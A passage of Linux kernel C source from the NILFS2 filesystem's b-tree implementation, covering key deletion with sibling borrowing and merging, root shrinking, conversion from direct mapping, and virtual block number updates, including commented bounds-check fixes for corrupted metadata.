				  int level, __u64 *keyp, __u64 *ptrp)
{
	struct nilfs_btree_node *node;
	int ncblk;

	if (level < nilfs_btree_height(btree) - 1) {
		node = nilfs_btree_get_nonroot_node(path, level);
		ncblk = nilfs_btree_nchildren_per_block(btree);
		nilfs_btree_node_delete(node, path[level].bp_index,
					keyp, ptrp, ncblk);
		if (!buffer_dirty(path[level].bp_bh))
			mark_buffer_dirty(path[level].bp_bh);
		/* deleting the first entry changes this node's smallest
		 * key; propagate the new one to the parent */
		if (path[level].bp_index == 0)
			nilfs_btree_promote_key(btree, path, level + 1,
				nilfs_btree_node_get_key(node, 0));
	} else {
		/* the root node lives in the inode, no buffer to dirty */
		node = nilfs_btree_get_root(btree);
		nilfs_btree_node_delete(node, path[level].bp_index,
					keyp, ptrp,
					NILFS_BTREE_ROOT_NCHILDREN_MAX);
	}
}
/*
 * nilfs_btree_borrow_left - delete an entry, then refill the underflowing
 * node with children borrowed from its left sibling
 * @btree: bmap struct of the b-tree
 * @path: lookup path; bp_sib_bh holds the left sibling
 * @level: tree level being rebalanced
 * @keyp: out (optional): key of the removed entry
 * @ptrp: out (optional): ptr of the removed entry
 */
static void nilfs_btree_borrow_left(struct nilfs_bmap *btree,
				    struct nilfs_btree_path *path,
				    int level, __u64 *keyp, __u64 *ptrp)
{
	struct nilfs_btree_node *node, *left;
	int nchildren, lnchildren, n, ncblk;

	nilfs_btree_do_delete(btree, path, level, keyp, ptrp);

	node = nilfs_btree_get_nonroot_node(path, level);
	left = nilfs_btree_get_sib_node(path, level);
	nchildren = nilfs_btree_node_get_nchildren(node);
	lnchildren = nilfs_btree_node_get_nchildren(left);
	ncblk = nilfs_btree_nchildren_per_block(btree);

	/* borrow enough children to even out the two nodes */
	n = (nchildren + lnchildren) / 2 - nchildren;

	nilfs_btree_node_move_right(left, node, n, ncblk, ncblk);

	if (!buffer_dirty(path[level].bp_bh))
		mark_buffer_dirty(path[level].bp_bh);
	if (!buffer_dirty(path[level].bp_sib_bh))
		mark_buffer_dirty(path[level].bp_sib_bh);

	/* this node's smallest key changed; update the parent */
	nilfs_btree_promote_key(btree, path, level + 1,
				nilfs_btree_node_get_key(node, 0));

	brelse(path[level].bp_sib_bh);
	path[level].bp_sib_bh = NULL;
	path[level].bp_index += n;
}
/*
 * nilfs_btree_borrow_right - delete an entry, then refill the underflowing
 * node with children borrowed from its right sibling
 * @btree: bmap struct of the b-tree
 * @path: lookup path; bp_sib_bh holds the right sibling
 * @level: tree level being rebalanced
 * @keyp: out (optional): key of the removed entry
 * @ptrp: out (optional): ptr of the removed entry
 */
static void nilfs_btree_borrow_right(struct nilfs_bmap *btree,
				     struct nilfs_btree_path *path,
				     int level, __u64 *keyp, __u64 *ptrp)
{
	struct nilfs_btree_node *node, *right;
	int nchildren, rnchildren, n, ncblk;

	nilfs_btree_do_delete(btree, path, level, keyp, ptrp);

	node = nilfs_btree_get_nonroot_node(path, level);
	right = nilfs_btree_get_sib_node(path, level);
	nchildren = nilfs_btree_node_get_nchildren(node);
	rnchildren = nilfs_btree_node_get_nchildren(right);
	ncblk = nilfs_btree_nchildren_per_block(btree);

	/* borrow enough children to even out the two nodes */
	n = (nchildren + rnchildren) / 2 - nchildren;

	nilfs_btree_node_move_left(node, right, n, ncblk, ncblk);

	if (!buffer_dirty(path[level].bp_bh))
		mark_buffer_dirty(path[level].bp_bh);
	if (!buffer_dirty(path[level].bp_sib_bh))
		mark_buffer_dirty(path[level].bp_sib_bh);

	/* the sibling's smallest key changed; update its parent entry */
	path[level + 1].bp_index++;
	nilfs_btree_promote_key(btree, path, level + 1,
				nilfs_btree_node_get_key(right, 0));
	path[level + 1].bp_index--;

	brelse(path[level].bp_sib_bh);
	path[level].bp_sib_bh = NULL;
}
/*
 * nilfs_btree_concat_left - delete an entry, then merge the underflowing
 * node into its left sibling and free the node's block
 * @btree: bmap struct of the b-tree
 * @path: lookup path; bp_sib_bh holds the left sibling
 * @level: tree level being rebalanced
 * @keyp: out (optional): key of the removed entry
 * @ptrp: out (optional): ptr of the removed entry
 */
static void nilfs_btree_concat_left(struct nilfs_bmap *btree,
				    struct nilfs_btree_path *path,
				    int level, __u64 *keyp, __u64 *ptrp)
{
	struct nilfs_btree_node *node, *left;
	int n, ncblk;

	nilfs_btree_do_delete(btree, path, level, keyp, ptrp);

	node = nilfs_btree_get_nonroot_node(path, level);
	left = nilfs_btree_get_sib_node(path, level);
	ncblk = nilfs_btree_nchildren_per_block(btree);

	/* move everything into the left sibling */
	n = nilfs_btree_node_get_nchildren(node);

	nilfs_btree_node_move_left(left, node, n, ncblk, ncblk);

	if (!buffer_dirty(path[level].bp_sib_bh))
		mark_buffer_dirty(path[level].bp_sib_bh);

	/* drop the now-empty node block and continue on the sibling */
	nilfs_btnode_delete(path[level].bp_bh);
	path[level].bp_bh = path[level].bp_sib_bh;
	path[level].bp_sib_bh = NULL;
	path[level].bp_index += nilfs_btree_node_get_nchildren(left);
}
/*
 * nilfs_btree_concat_right - delete an entry, then merge the right sibling
 * into the underflowing node and free the sibling's block
 * @btree: bmap struct of the b-tree
 * @path: lookup path; bp_sib_bh holds the right sibling
 * @level: tree level being rebalanced
 * @keyp: out (optional): key of the removed entry
 * @ptrp: out (optional): ptr of the removed entry
 */
static void nilfs_btree_concat_right(struct nilfs_bmap *btree,
				     struct nilfs_btree_path *path,
				     int level, __u64 *keyp, __u64 *ptrp)
{
	struct nilfs_btree_node *node, *right;
	int n, ncblk;

	nilfs_btree_do_delete(btree, path, level, keyp, ptrp);

	node = nilfs_btree_get_nonroot_node(path, level);
	right = nilfs_btree_get_sib_node(path, level);
	ncblk = nilfs_btree_nchildren_per_block(btree);

	/* pull the whole right sibling into this node */
	n = nilfs_btree_node_get_nchildren(right);

	nilfs_btree_node_move_left(node, right, n, ncblk, ncblk);

	if (!buffer_dirty(path[level].bp_bh))
		mark_buffer_dirty(path[level].bp_bh);

	nilfs_btnode_delete(path[level].bp_sib_bh);
	path[level].bp_sib_bh = NULL;
	/* point the parent-level path at the sibling's (now stale) entry
	 * so the delete at level + 1 removes it */
	path[level + 1].bp_index++;
}
/*
 * nilfs_btree_shrink - delete an entry, then collapse the root's only
 * child into the root, reducing the tree height by one
 * @btree: bmap struct of the b-tree
 * @path: lookup path
 * @level: level of the root's only child
 * @keyp: out (optional): key of the removed entry
 * @ptrp: out (optional): ptr of the removed entry
 */
static void nilfs_btree_shrink(struct nilfs_bmap *btree,
			       struct nilfs_btree_path *path,
			       int level, __u64 *keyp, __u64 *ptrp)
{
	struct nilfs_btree_node *root, *child;
	int n, ncblk;

	nilfs_btree_do_delete(btree, path, level, keyp, ptrp);

	root = nilfs_btree_get_root(btree);
	child = nilfs_btree_get_nonroot_node(path, level);
	ncblk = nilfs_btree_nchildren_per_block(btree);

	/* drop the root's pointer to the child and demote the root */
	nilfs_btree_node_delete(root, 0, NULL, NULL,
				NILFS_BTREE_ROOT_NCHILDREN_MAX);
	nilfs_btree_node_set_level(root, level);

	/* move the child's entries up into the root, free its block */
	n = nilfs_btree_node_get_nchildren(child);
	nilfs_btree_node_move_left(root, child, n,
				   NILFS_BTREE_ROOT_NCHILDREN_MAX, ncblk);

	nilfs_btnode_delete(path[level].bp_bh);
	path[level].bp_bh = NULL;
}
/*
 * nilfs_btree_nop - do-nothing per-level operation, staged at the root
 * level when nilfs_btree_shrink() already handles the root itself
 */
static void nilfs_btree_nop(struct nilfs_bmap *btree,
			    struct nilfs_btree_path *path,
			    int level, __u64 *keyp, __u64 *ptrp)
{
}
/*
 * nilfs_btree_prepare_delete - reserve resources and choose the per-level
 * rebalancing operations for a deletion
 * @btree: bmap struct of the b-tree
 * @path: lookup path for the key being deleted
 * @levelp: out: highest level at which an operation was staged
 * @stats: out: number of blocks the deletion will release
 * @dat: DAT inode, or NULL when the tree does not use virtual blocks
 *
 * For each level from the leaf up, stages one of do_delete / borrow_left /
 * borrow_right / concat_left / concat_right / shrink in path[level].bp_op
 * and prepares disposal of the ptr being removed at that level.  On error
 * all preparations made so far are rolled back.
 * Returns 0 on success or a negative error code.
 */
static int nilfs_btree_prepare_delete(struct nilfs_bmap *btree,
				      struct nilfs_btree_path *path,
				      int *levelp,
				      struct nilfs_bmap_stats *stats,
				      struct inode *dat)
{
	struct buffer_head *bh;
	struct nilfs_btree_node *node, *parent, *sib;
	__u64 sibptr;
	int pindex, dindex, level, ncmin, ncmax, ncblk, ret;

	ret = 0;
	stats->bs_nblocks = 0;
	ncmin = NILFS_BTREE_NODE_NCHILDREN_MIN(nilfs_btree_node_size(btree));
	ncblk = nilfs_btree_nchildren_per_block(btree);

	/* dindex is the index of the ptr to dispose of at each level; it
	 * normally tracks pindex but is shifted for right-concatenation */
	for (level = NILFS_BTREE_LEVEL_NODE_MIN, dindex = path[level].bp_index;
	     level < nilfs_btree_height(btree) - 1;
	     level++) {
		node = nilfs_btree_get_nonroot_node(path, level);
		path[level].bp_oldreq.bpr_ptr =
			nilfs_btree_node_get_ptr(node, dindex, ncblk);
		ret = nilfs_bmap_prepare_end_ptr(btree,
						 &path[level].bp_oldreq, dat);
		if (ret < 0)
			goto err_out_child_node;

		if (nilfs_btree_node_get_nchildren(node) > ncmin) {
			/* node stays above minimum: plain delete suffices */
			path[level].bp_op = nilfs_btree_do_delete;
			stats->bs_nblocks++;
			goto out;
		}

		parent = nilfs_btree_get_node(btree, path, level + 1, &ncmax);
		pindex = path[level + 1].bp_index;
		dindex = pindex;

		if (pindex > 0) {
			/* left sibling */
			sibptr = nilfs_btree_node_get_ptr(parent, pindex - 1,
							  ncmax);
			ret = nilfs_btree_get_block(btree, sibptr, &bh);
			if (ret < 0)
				goto err_out_curr_node;
			sib = (struct nilfs_btree_node *)bh->b_data;
			if (nilfs_btree_node_get_nchildren(sib) > ncmin) {
				path[level].bp_sib_bh = bh;
				path[level].bp_op = nilfs_btree_borrow_left;
				stats->bs_nblocks++;
				goto out;
			} else {
				path[level].bp_sib_bh = bh;
				path[level].bp_op = nilfs_btree_concat_left;
				stats->bs_nblocks++;
				/* continue; */
			}
		} else if (pindex <
			   nilfs_btree_node_get_nchildren(parent) - 1) {
			/* right sibling */
			sibptr = nilfs_btree_node_get_ptr(parent, pindex + 1,
							  ncmax);
			ret = nilfs_btree_get_block(btree, sibptr, &bh);
			if (ret < 0)
				goto err_out_curr_node;
			sib = (struct nilfs_btree_node *)bh->b_data;
			if (nilfs_btree_node_get_nchildren(sib) > ncmin) {
				path[level].bp_sib_bh = bh;
				path[level].bp_op = nilfs_btree_borrow_right;
				stats->bs_nblocks++;
				goto out;
			} else {
				path[level].bp_sib_bh = bh;
				path[level].bp_op = nilfs_btree_concat_right;
				stats->bs_nblocks++;
				/*
				 * When merging right sibling node
				 * into the current node, pointer to
				 * the right sibling node must be
				 * terminated instead.  The adjustment
				 * below is required for that.
				 */
				dindex = pindex + 1;
				/* continue; */
			}
		} else {
			/* no siblings */
			/* the only child of the root node */
			WARN_ON(level != nilfs_btree_height(btree) - 2);
			if (nilfs_btree_node_get_nchildren(node) - 1 <=
			    NILFS_BTREE_ROOT_NCHILDREN_MAX) {
				/* the child fits into the root: shrink */
				path[level].bp_op = nilfs_btree_shrink;
				stats->bs_nblocks += 2;
				level++;
				path[level].bp_op = nilfs_btree_nop;
				goto shrink_root_child;
			} else {
				path[level].bp_op = nilfs_btree_do_delete;
				stats->bs_nblocks++;
				goto out;
			}
		}
	}

	/* child of the root node is deleted */
	path[level].bp_op = nilfs_btree_do_delete;
	stats->bs_nblocks++;

shrink_root_child:
	node = nilfs_btree_get_root(btree);
	path[level].bp_oldreq.bpr_ptr =
		nilfs_btree_node_get_ptr(node, dindex,
					 NILFS_BTREE_ROOT_NCHILDREN_MAX);

	ret = nilfs_bmap_prepare_end_ptr(btree, &path[level].bp_oldreq, dat);
	if (ret < 0)
		goto err_out_child_node;

	/* success */
 out:
	*levelp = level;
	return ret;

	/* error */
 err_out_curr_node:
	nilfs_bmap_abort_end_ptr(btree, &path[level].bp_oldreq, dat);
 err_out_child_node:
	/* roll back sibling references and ptr disposals staged below */
	for (level--; level >= NILFS_BTREE_LEVEL_NODE_MIN; level--) {
		brelse(path[level].bp_sib_bh);
		nilfs_bmap_abort_end_ptr(btree, &path[level].bp_oldreq, dat);
	}
	*levelp = level;
	stats->bs_nblocks = 0;
	return ret;
}
/*
 * nilfs_btree_commit_delete - execute the deletion staged by
 * nilfs_btree_prepare_delete()
 * @btree: bmap struct of the b-tree
 * @path: lookup path with per-level staged operations (bp_op)
 * @maxlevel: highest level to run an operation at
 * @dat: DAT inode, or NULL when the tree does not use virtual blocks
 */
static void nilfs_btree_commit_delete(struct nilfs_bmap *btree,
				      struct nilfs_btree_path *path,
				      int maxlevel, struct inode *dat)
{
	int lv = NILFS_BTREE_LEVEL_NODE_MIN;

	/* finalize ptr disposal, then run the staged op, level by level */
	for (; lv <= maxlevel; lv++) {
		nilfs_bmap_commit_end_ptr(btree, &path[lv].bp_oldreq, dat);
		path[lv].bp_op(btree, path, lv, NULL, NULL);
	}

	if (!nilfs_bmap_dirty(btree))
		nilfs_bmap_set_dirty(btree);
}
/*
 * nilfs_btree_delete - delete the entry with the given key
 * @btree: bmap struct of the b-tree
 * @key: key to delete
 *
 * Returns 0 on success, -ENOMEM on path allocation failure, or the error
 * from lookup/prepare (e.g. -ENOENT when @key does not exist).
 */
static int nilfs_btree_delete(struct nilfs_bmap *btree, __u64 key)
{
	struct nilfs_bmap_stats stats;
	struct nilfs_btree_path *path;
	struct inode *dat;
	int maxlevel, err;

	path = nilfs_btree_alloc_path();
	if (!path)
		return -ENOMEM;

	err = nilfs_btree_do_lookup(btree, path, key, NULL,
				    NILFS_BTREE_LEVEL_NODE_MIN, 0);
	if (err < 0)
		goto out;

	dat = NILFS_BMAP_USE_VBN(btree) ? nilfs_bmap_get_dat(btree) : NULL;

	err = nilfs_btree_prepare_delete(btree, path, &maxlevel, &stats, dat);
	if (err < 0)
		goto out;
	nilfs_btree_commit_delete(btree, path, maxlevel, dat);
	nilfs_inode_sub_blocks(btree->b_inode, stats.bs_nblocks);

 out:
	nilfs_btree_free_path(path);
	return err;
}
/*
 * nilfs_btree_last_key - find the largest key stored in the b-tree
 * @btree: bmap struct of the b-tree
 * @keyp: out: the last (largest) key
 *
 * Returns 0 on success, -ENOMEM on path allocation failure, or the error
 * from the lookup.
 */
static int nilfs_btree_last_key(const struct nilfs_bmap *btree, __u64 *keyp)
{
	struct nilfs_btree_path *path = nilfs_btree_alloc_path();
	int err;

	if (!path)
		return -ENOMEM;

	err = nilfs_btree_do_lookup_last(btree, path, keyp, NULL);
	nilfs_btree_free_path(path);

	return err;
}
/*
 * nilfs_btree_check_delete - check whether deleting @key would make the
 * mapping small enough to convert back to a direct mapping
 * @btree: bmap struct of the b-tree
 * @key: key about to be deleted
 *
 * Returns 1 when @key is the last (largest) key and the remaining largest
 * key fits a direct mapping, 0 otherwise, or a negative error code.
 *
 * Fix: guard against nchildren == 0 on a corrupted tree.  The original
 * code indexed nodes with "nchildren - 1", which underflows to -1 and
 * reads out of bounds when a node is (bogusly) empty.
 */
static int nilfs_btree_check_delete(struct nilfs_bmap *btree, __u64 key)
{
	struct buffer_head *bh;
	struct nilfs_btree_node *root, *node;
	__u64 maxkey, nextmaxkey;
	__u64 ptr;
	int nchildren, ret;

	root = nilfs_btree_get_root(btree);
	switch (nilfs_btree_height(btree)) {
	case 2:
		bh = NULL;
		node = root;
		break;
	case 3:
		nchildren = nilfs_btree_node_get_nchildren(root);
		if (nchildren > 1)
			return 0;
		/* corrupted metadata: an empty root at height 3 would
		 * make "nchildren - 1" index out of bounds below */
		if (nchildren < 1)
			return 0;
		ptr = nilfs_btree_node_get_ptr(root, nchildren - 1,
					       NILFS_BTREE_ROOT_NCHILDREN_MAX);
		ret = nilfs_btree_get_block(btree, ptr, &bh);
		if (ret < 0)
			return ret;
		node = (struct nilfs_btree_node *)bh->b_data;
		break;
	default:
		return 0;
	}

	nchildren = nilfs_btree_node_get_nchildren(node);
	if (nchildren < 1) {
		/* corrupted metadata: nothing to examine, do not convert */
		if (bh != NULL)
			brelse(bh);
		return 0;
	}
	maxkey = nilfs_btree_node_get_key(node, nchildren - 1);
	nextmaxkey = (nchildren > 1) ?
		nilfs_btree_node_get_key(node, nchildren - 2) : 0;
	if (bh != NULL)
		brelse(bh);

	return (maxkey == key) && (nextmaxkey < NILFS_BMAP_LARGE_LOW);
}
/*
 * nilfs_btree_gather_data - copy up to @nitems key/ptr pairs out of the
 * b-tree (used when converting back to a direct mapping)
 * @btree: bmap struct of the b-tree
 * @keys: out: array receiving the keys
 * @ptrs: out: array receiving the pointers
 * @nitems: capacity of @keys/@ptrs
 *
 * Returns the number of pairs copied, or a negative error code.
 *
 * Fix: guard against nchildren == 0 on a corrupted tree; the original
 * "nchildren - 1" index underflows to -1 and reads out of bounds.  Also
 * dropped a dead "node = NULL" store before an immediate return.
 */
static int nilfs_btree_gather_data(struct nilfs_bmap *btree,
				   __u64 *keys, __u64 *ptrs, int nitems)
{
	struct buffer_head *bh;
	struct nilfs_btree_node *node, *root;
	__le64 *dkeys;
	__le64 *dptrs;
	__u64 ptr;
	int nchildren, ncmax, i, ret;

	root = nilfs_btree_get_root(btree);
	switch (nilfs_btree_height(btree)) {
	case 2:
		bh = NULL;
		node = root;
		ncmax = NILFS_BTREE_ROOT_NCHILDREN_MAX;
		break;
	case 3:
		nchildren = nilfs_btree_node_get_nchildren(root);
		/* corrupted metadata: an empty root at height 3 would make
		 * "nchildren - 1" index out of bounds below */
		if (nchildren < 1)
			return -EINVAL;
		WARN_ON(nchildren > 1);
		ptr = nilfs_btree_node_get_ptr(root, nchildren - 1,
					       NILFS_BTREE_ROOT_NCHILDREN_MAX);
		ret = nilfs_btree_get_block(btree, ptr, &bh);
		if (ret < 0)
			return ret;
		node = (struct nilfs_btree_node *)bh->b_data;
		ncmax = nilfs_btree_nchildren_per_block(btree);
		break;
	default:
		return -EINVAL;
	}

	nchildren = nilfs_btree_node_get_nchildren(node);
	if (nchildren < nitems)
		nitems = nchildren;
	dkeys = nilfs_btree_node_dkeys(node);
	dptrs = nilfs_btree_node_dptrs(node, ncmax);
	for (i = 0; i < nitems; i++) {
		keys[i] = le64_to_cpu(dkeys[i]);
		ptrs[i] = le64_to_cpu(dptrs[i]);
	}

	if (bh != NULL)
		brelse(bh);

	return nitems;
}
/*
 * nilfs_btree_prepare_convert_and_insert - reserve the pointers (and, if
 * needed, a new node block) for converting a direct mapping to a b-tree
 * @btree: bmap struct being converted
 * @key: key of the entry being inserted along with the conversion
 * @dreq: ptr request for the new data block
 * @nreq: ptr request for a new node block, or NULL if the root suffices
 * @bhp: out: buffer of the new node block (NULL when @nreq is NULL)
 * @stats: out: number of blocks the conversion will add
 *
 * Returns 0 on success or a negative error code; on error all
 * reservations are rolled back.
 */
static int
nilfs_btree_prepare_convert_and_insert(struct nilfs_bmap *btree, __u64 key,
				       union nilfs_bmap_ptr_req *dreq,
				       union nilfs_bmap_ptr_req *nreq,
				       struct buffer_head **bhp,
				       struct nilfs_bmap_stats *stats)
{
	struct buffer_head *bh;
	struct inode *dat = NULL;
	int ret;

	stats->bs_nblocks = 0;

	/* for data */
	/* cannot find near ptr */
	if (NILFS_BMAP_USE_VBN(btree)) {
		dreq->bpr_ptr = nilfs_btree_find_target_v(btree, NULL, key);
		dat = nilfs_bmap_get_dat(btree);
	}

	ret = nilfs_bmap_prepare_alloc_ptr(btree, dreq, dat);
	if (ret < 0)
		return ret;

	*bhp = NULL;
	stats->bs_nblocks++;
	if (nreq != NULL) {
		/* also need a child node: reserve the next ptr and get a
		 * fresh block for it */
		nreq->bpr_ptr = dreq->bpr_ptr + 1;
		ret = nilfs_bmap_prepare_alloc_ptr(btree, nreq, dat);
		if (ret < 0)
			goto err_out_dreq;

		ret = nilfs_btree_get_new_block(btree, nreq->bpr_ptr, &bh);
		if (ret < 0)
			goto err_out_nreq;

		*bhp = bh;
		stats->bs_nblocks++;
	}

	/* success */
	return 0;

	/* error */
 err_out_nreq:
	nilfs_bmap_abort_alloc_ptr(btree, nreq, dat);
 err_out_dreq:
	nilfs_bmap_abort_alloc_ptr(btree, dreq, dat);
	stats->bs_nblocks = 0;
	return ret;
}
/*
 * nilfs_btree_commit_convert_and_insert - build the initial b-tree from
 * the gathered direct-mapping entries plus the new entry
 * @btree: bmap struct being converted
 * @key: key of the new entry
 * @ptr: buffer_head of the new data block cast to __u64
 * @keys: keys gathered from the old direct mapping
 * @ptrs: ptrs gathered from the old direct mapping
 * @n: number of entries in @keys/@ptrs
 * @dreq: committed ptr request for the data block
 * @nreq: ptr request for the child node, or NULL for a root-only tree
 * @bh: buffer of the new child node (only when @nreq != NULL)
 */
static void
nilfs_btree_commit_convert_and_insert(struct nilfs_bmap *btree,
				      __u64 key, __u64 ptr,
				      const __u64 *keys, const __u64 *ptrs,
				      int n,
				      union nilfs_bmap_ptr_req *dreq,
				      union nilfs_bmap_ptr_req *nreq,
				      struct buffer_head *bh)
{
	struct nilfs_btree_node *node;
	struct inode *dat;
	__u64 tmpptr;
	int ncblk;

	/* free resources */
	if (btree->b_ops->bop_clear != NULL)
		btree->b_ops->bop_clear(btree);

	/* ptr must be a pointer to a buffer head. */
	set_buffer_nilfs_volatile((struct buffer_head *)((unsigned long)ptr));

	/* convert and insert */
	dat = NILFS_BMAP_USE_VBN(btree) ? nilfs_bmap_get_dat(btree) : NULL;
	nilfs_btree_init(btree);
	if (nreq != NULL) {
		nilfs_bmap_commit_alloc_ptr(btree, dreq, dat);
		nilfs_bmap_commit_alloc_ptr(btree, nreq, dat);

		/* create child node at level 1 */
		node = (struct nilfs_btree_node *)bh->b_data;
		ncblk = nilfs_btree_nchildren_per_block(btree);
		nilfs_btree_node_init(node, 0, 1, n, ncblk, keys, ptrs);
		nilfs_btree_node_insert(node, n, key, dreq->bpr_ptr, ncblk);
		if (!buffer_dirty(bh))
			mark_buffer_dirty(bh);
		if (!nilfs_bmap_dirty(btree))
			nilfs_bmap_set_dirty(btree);

		brelse(bh);

		/* create root node at level 2 */
		node = nilfs_btree_get_root(btree);
		tmpptr = nreq->bpr_ptr;
		nilfs_btree_node_init(node, NILFS_BTREE_NODE_ROOT, 2, 1,
				      NILFS_BTREE_ROOT_NCHILDREN_MAX,
				      &keys[0], &tmpptr);
	} else {
		nilfs_bmap_commit_alloc_ptr(btree, dreq, dat);

		/* create root node at level 1 */
		node = nilfs_btree_get_root(btree);
		nilfs_btree_node_init(node, NILFS_BTREE_NODE_ROOT, 1, n,
				      NILFS_BTREE_ROOT_NCHILDREN_MAX,
				      keys, ptrs);
		nilfs_btree_node_insert(node, n, key, dreq->bpr_ptr,
					NILFS_BTREE_ROOT_NCHILDREN_MAX);
		if (!nilfs_bmap_dirty(btree))
			nilfs_bmap_set_dirty(btree);
	}

	/* remember the insert position as a hint for the next allocation */
	if (NILFS_BMAP_USE_VBN(btree))
		nilfs_bmap_set_target_v(btree, key, dreq->bpr_ptr);
}
/**
 * nilfs_btree_convert_and_insert - convert a direct mapping into a b-tree
 *	and insert a new key/pointer pair
 * @btree: bmap structure to be converted to a b-tree
 * @key: key of the new entry to insert after conversion
 * @ptr: pointer of the new entry (buffer head of the data block, cast)
 * @keys: array of keys gathered from the original direct mapping
 * @ptrs: array of pointers gathered from the original direct mapping
 * @n: number of entries in @keys and @ptrs
 */
int nilfs_btree_convert_and_insert(struct nilfs_bmap *btree,
				   __u64 key, __u64 ptr,
				   const __u64 *keys, const __u64 *ptrs, int n)
{
	union nilfs_bmap_ptr_req dreq, nreq, *di, *ni;
	struct nilfs_bmap_stats stats;
	struct buffer_head *bh;
	int err;

	if (n + 1 <= NILFS_BTREE_ROOT_NCHILDREN_MAX) {
		/* all entries fit directly in the root node */
		di = &dreq;
		ni = NULL;
	} else if (n + 1 <= NILFS_BTREE_NODE_NCHILDREN_MAX(
			   1 << btree->b_inode->i_blkbits)) {
		/* need one child node in addition to the root */
		di = &dreq;
		ni = &nreq;
	} else {
		di = NULL;
		ni = NULL;
		BUG();
	}

	err = nilfs_btree_prepare_convert_and_insert(btree, key, di, ni, &bh,
						     &stats);
	if (err < 0)
		return err;
	nilfs_btree_commit_convert_and_insert(btree, key, ptr, keys, ptrs, n,
					      di, ni, bh);
	nilfs_inode_add_blocks(btree->b_inode, stats.bs_nblocks);
	return 0;
}
/*
 * nilfs_btree_propagate_p - propagate dirtiness up the tree (physical
 * block number variant)
 * @btree: bmap struct of the b-tree
 * @path: lookup path for the dirtied block
 * @level: level of the dirtied block
 * @bh: buffer of the dirtied block (unused here)
 *
 * Walks upward marking ancestor node buffers dirty, stopping at the
 * first ancestor that is already dirty (everything above it must then
 * already be dirty too).  Always returns 0.
 */
static int nilfs_btree_propagate_p(struct nilfs_bmap *btree,
				   struct nilfs_btree_path *path,
				   int level,
				   struct buffer_head *bh)
{
	while ((++level < nilfs_btree_height(btree) - 1) &&
	       !buffer_dirty(path[level].bp_bh))
		mark_buffer_dirty(path[level].bp_bh);

	return 0;
}
/*
 * nilfs_btree_prepare_update_v - prepare reassignment of the virtual
 * block number of the node at @level
 * @btree: bmap struct of the b-tree
 * @path: lookup path
 * @level: level of the node to update
 * @dat: DAT inode
 *
 * Reserves a new virtual block number (old + 1) in the DAT and, for node
 * blocks, prepares rekeying the block in the btnode cache.
 * Returns 0 on success or a negative error code.
 */
static int nilfs_btree_prepare_update_v(struct nilfs_bmap *btree,
					struct nilfs_btree_path *path,
					int level, struct inode *dat)
{
	struct nilfs_btree_node *parent;
	int ncmax, ret;

	parent = nilfs_btree_get_node(btree, path, level + 1, &ncmax);
	path[level].bp_oldreq.bpr_ptr =
		nilfs_btree_node_get_ptr(parent, path[level + 1].bp_index,
					 ncmax);
	path[level].bp_newreq.bpr_ptr = path[level].bp_oldreq.bpr_ptr + 1;
	ret = nilfs_dat_prepare_update(dat, &path[level].bp_oldreq.bpr_req,
				       &path[level].bp_newreq.bpr_req);
	if (ret < 0)
		return ret;

	if (buffer_nilfs_node(path[level].bp_bh)) {
		/* node blocks are indexed by their virtual block number in
		 * the btnode cache, so a ptr change means a key change */
		path[level].bp_ctxt.oldkey = path[level].bp_oldreq.bpr_ptr;
		path[level].bp_ctxt.newkey = path[level].bp_newreq.bpr_ptr;
		path[level].bp_ctxt.bh = path[level].bp_bh;
		ret = nilfs_btnode_prepare_change_key(
			&NILFS_BMAP_I(btree)->i_btnode_cache,
			&path[level].bp_ctxt);
		if (ret < 0) {
			/* roll back the DAT update on failure */
			nilfs_dat_abort_update(dat,
					       &path[level].bp_oldreq.bpr_req,
					       &path[level].bp_newreq.bpr_req);
			return ret;
		}
	}

	return 0;
}
/*
 * nilfs_btree_commit_update_v - commit the virtual block number change
 * prepared by nilfs_btree_prepare_update_v()
 * @btree: bmap struct of the b-tree
 * @path: lookup path
 * @level: level of the node being updated
 * @dat: DAT inode
 */
static void nilfs_btree_commit_update_v(struct nilfs_bmap *btree,
					struct nilfs_btree_path *path,
					int level, struct inode *dat)
{
	struct nilfs_btree_node *parent;
	int ncmax;

	nilfs_dat_commit_update(dat, &path[level].bp_oldreq.bpr_req,
				&path[level].bp_newreq.bpr_req,
				btree->b_ptr_type == NILFS_BMAP_PTR_VS);

	if (buffer_nilfs_node(path[level].bp_bh)) {
		/* finish rekeying the node block in the btnode cache; the
		 * buffer may have been replaced, so refresh bp_bh */
		nilfs_btnode_commit_change_key(
			&NILFS_BMAP_I(btree)->i_btnode_cache,
			&path[level].bp_ctxt);
		path[level].bp_bh = path[level].bp_ctxt.bh;
	}
	set_buffer_nilfs_volatile(path[level].bp_bh);

	/* record the new ptr in the parent node */
	parent = nilfs_btree_get_node(btree, path, level + 1, &ncmax);
	nilfs_btree_node_set_ptr(parent, path[level + 1].bp_index,
				 path[level].bp_newreq.bpr_ptr, ncmax);
}
/*
 * nilfs_btree_abort_update_v - abort the virtual block number change
 * prepared by nilfs_btree_prepare_update_v()
 * @btree: bmap struct of the b-tree
 * @path: lookup path
 * @level: level of the node whose update is cancelled
 * @dat: DAT inode
 */
static void nilfs_btree_abort_update_v(struct nilfs_bmap *btree,
				       struct nilfs_btree_path *path,
				       int level, struct inode *dat)
{
	struct nilfs_btree_path *p = &path[level];

	nilfs_dat_abort_update(dat, &p->bp_oldreq.bpr_req,
			       &p->bp_newreq.bpr_req);
	if (buffer_nilfs_node(p->bp_bh))
		nilfs_btnode_abort_change_key(
			&NILFS_BMAP_I(btree)->i_btnode_cache, &p->bp_ctxt);
}
/*
 * nilfs_btree_prepare_propagate_v - prepare ptr updates for @minlevel and
 * every not-yet-dirty ancestor above it
 * @btree: bmap struct of the b-tree
 * @path: lookup path
 * @minlevel: level to start from
 * @maxlevelp: out: highest level that was prepared
 * @dat: DAT inode
 *
 * Returns 0 on success or a negative error code; on error all updates
 * prepared so far are aborted.
 */
static int nilfs_btree_prepare_propagate_v(struct nilfs_bmap *btree,
					   struct nilfs_btree_path *path,
					   int minlevel, int *maxlevelp,
					   struct inode *dat)
{
	int level, ret;

	level = minlevel;
	/* a volatile buffer already has a fresh ptr this segment */
	if (!buffer_nilfs_volatile(path[level].bp_bh)) {
		ret = nilfs_btree_prepare_update_v(btree, path, level, dat);
		if (ret < 0)
			return ret;
	}
	/* climb until the first already-dirty ancestor */
	while ((++level < nilfs_btree_height(btree) - 1) &&
	       !buffer_dirty(path[level].bp_bh)) {
		WARN_ON(buffer_nilfs_volatile(path[level].bp_bh));
		ret = nilfs_btree_prepare_update_v(btree, path, level, dat);
		if (ret < 0)
			goto out;
	}

	/* success */
	*maxlevelp = level - 1;
	return 0;

	/* error */
 out:
	/* abort every level prepared above minlevel, then minlevel itself
